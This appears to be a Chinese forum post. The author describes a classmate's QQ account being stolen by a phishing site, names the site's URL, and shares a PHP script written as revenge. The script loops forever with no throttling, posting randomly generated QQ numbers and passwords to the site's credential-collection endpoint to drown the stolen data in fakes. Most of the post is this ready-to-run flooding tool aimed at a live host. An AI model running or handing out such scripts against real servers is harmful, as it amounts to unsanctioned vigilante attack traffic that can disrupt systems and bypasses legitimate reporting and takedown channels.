为什么钓鱼网站这么容易看出来,还有很多人老中招呢?今天一个同学又中招了,QQ号被盗了。
钓鱼网站地址:
http://2d6kffw6y.qqxzo.com/shouji/index.asp?uid=352&u=103&d=220被盗之后还会拿这个号码继续群发一些很诱惑的信息,比如什么砍人的新闻,让更多的人上当
以前身边的人就经常被钓,一直想着报复一下钓鱼网站,今天终于动手了
原理很简单,不停提交随机的QQ号和密码,让对方无法判断哪个是真的号码
以下是php代码,在cli中运行:
<?php
function random_readable_pwd($length=10){
// the wordlist from which the password gets generated
// (change them as you like)
$words = 'dog,cat,sheep,sun,sky,red,ball,happy,ice,xue,1989,1991,%,8,6,';
$words .= 'green,blue,music,ting,radio,peng,turbo,song,!@#,55,1990,$,90,99,';
$words .= 'jun,an,paper,water,fire,storm,xiao,abc,123,456,@,66,121,ai,100,';
$words .= 'boot,freedom,wang,nice,fan,small,eyes,aaa,!,888,xm,woai,6666,';
$words .= 'path,kid,box,black,flower,ping,pong,smile,2000,00,321,zhao,kk,';
$words .= 'he,niu,ll,plus,king,tv,ring,jiao,xiao,lei,1980,1995,zz,1986';
// Split by ",":
$words = explode(',', $words);
if (count($words) == 0){ die('Wordlist is empty!'); }
// Add words while password is smaller than the given length
$pwd = '';
while (strlen($pwd) < $length){
$r = mt_rand(0, count($words)-1);
$pwd .= $words[$r];
}
// append a number at the end if length > 2 and
// reduce the password size to $length
$num = mt_rand(1, 99);
if ($length > 2){
$pwd = substr($pwd,0,$length-strlen($num)).$num;
} else {
$pwd = substr($pwd, 0, $length);
}
return $pwd;
}
$serverurl='
http://2d6kffw6y.qqxzo.com/shouji/saveinfo.asp';while(1){
$u=rand(1000000, 9999999999);
$p=random_readable_pwd(rand(7,13));
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $serverurl );
curl_setopt($ch, CURLOPT_TIMEOUT, 5);
$url = "uid=103&u=$u&p=$p";
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, $url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$data = curl_exec($ch);
curl_close($ch);
echo date('H:i:s').' u='.$u.' p='.$p.' r='.$data."\n";
}
?>